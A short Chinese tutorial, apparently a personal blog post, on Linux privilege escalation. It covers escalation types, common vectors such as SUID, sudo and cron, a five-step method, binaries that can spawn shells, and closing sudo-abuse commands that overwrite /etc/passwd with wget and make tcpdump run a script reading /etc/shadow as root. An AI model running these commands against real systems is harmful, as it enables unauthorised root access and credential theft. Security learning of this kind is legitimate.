大多数操作系统设计可为多个用户提供同时服务。提权中的“权”指的是允许用户执行的操作。普通特权一般指的是查看或编辑系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看死人信息或悄咪咪安装一些程序(比如说木马),通常当系统存在允许绕过安全性的漏洞时就会发生提权。通常利用操作系统或软件中的BUG来获得提权。从而使骇客执行未经授权的操作,如插入永久后门,读写敏感信息。完成重启关机等操作!
提权一般分为:水平和垂直。
水平提权:从一个用户转移到另一个用户。[如su root]
垂直提权:一般将特权从普通用户升级为超级管理员
行动方向
内核漏洞
以ROOT身份运行的程序
已安装的软件
弱密码/重用密码/纯文本密码
内部服务
Suid配置错误
滥用Sudo权力
由root调用的可写脚本
路径配置错误
Cronjobs
卸载的文件系统
信息收集是关键!
1、收集信息。2、整理信息(分析收集到的信息和整合信息)3、搜索漏洞。4、修改代码(修改漏洞利用程序,使其适合当前环境)5、尝试攻击提权
————————我在军训 慢慢更新————————
可用于产生SHELL的工具:
- Nmap
- Vim
- Less
- More
- Nano
- Cp
- Mv
- Find
什么是SUDO?
sudo是linux系统管理命令,是允许系统管理员让普通用户执行一些或全部root命令的一个工具,如halt,reboot,su等,这样不仅可以节省管理时间,同样也提高安全性,sudo不是shell的代替品,是一个命令
查看允许的命令
sudo -l
举例实战
wget
wget http://localhost:8080/passwd -O /etc/passwd
tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
我爱华为
加油